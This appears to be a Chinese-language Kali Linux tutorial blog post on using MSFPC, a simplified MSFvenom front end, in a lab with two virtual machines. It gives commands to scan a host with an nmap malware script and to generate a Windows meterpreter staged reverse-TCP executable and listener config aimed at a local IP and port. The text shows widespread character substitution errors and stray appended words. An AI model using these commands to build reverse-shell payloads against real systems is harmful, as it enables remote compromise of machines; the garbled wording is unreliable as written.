课前声明:
一、本分享仅作学习交流,请自觉遵照法律法规!
二、搜索:Kali 与编程,学习更多网络***干货!
三、Kali 与编程天天准时更新,敬请学习和关注!linux
正文部分
1、背景介绍
通常来讲,生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个很是强大的payload生成神器,可是对于一些新手来讲,可能难以在短期内熟悉其操做。即便在进行最初的了解以后,生成一个基本的payload也须要输入至关多的内容,而今天,咱们将看到使用MSFPC更便捷地生成paylaod。
MSFPC,或者说是MSFvenom Payload生成器,实际上是一个基于MSFvenom的Payload生成器,可是它旨在简化基本的有效载荷建立过程,用户使用MSFPC能够尽量简单地建立Payload,有时甚至只须要一个参数!若是你之前使用过MSFvenom,那么可能已经自行编写了一个简单的shell脚原本自动化频繁地生成Payload。即便这样,这个工具也绝对值得一试。shell
2、资源装备
1.安装好 Kali Linux 的虚拟机一台;
2.kali linux 受害者虚拟机一个;
3.整装待发的小白一个。编程
3、战略安排
3.1 经过Nmap脚本扫描WEB服务器或我的计算机是否被植入***
命令:nmap --script=http-malware-host IP
命令:nmap --script=http-malware-host 192.168.0.103
3.2 nmap扫描结果以下图所示。
Host appears to be clean表示扫描的主机没有被植入***。
3.3 普通的常常使用的Payload生成器简单介绍,以下图所示。
命令:msfvenom
3.4 利用命令行查看msfpc payload生成器生成的payload类别。
命令:msfpc
命令:msfpc --help
3.5 查看即将充当监听主机的主机IP地址,以下图所示。
命令:ifconfig
3.6 利用msfpc开始监听端口而且生成相应的payload,以下图所示。
命令:msfpc windows IP port
命令:msfpc windows 192.168.0.104 555
3.7 查看msfpc工具生成的payload信息,以下图所示。
命令:ls
文件: windows-meterpreter-staged-reverse-tcp-555.exe
文件: windows-meterpreter-staged-reverse-tcp-555.exe.rc(payload配置信息)
3.8 查看“windows-meterpreter-staged-reverse-tcp-555.exe.rc”的文件内容,以下图所示。windows
辛苦原创,你的每一次评论点赞和关注,都是咱们源源不断的创做动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux ***与白帽编程技巧呢!
点我学习更多Kali Linux***测试与网络***实战技巧!请添加连接描述安全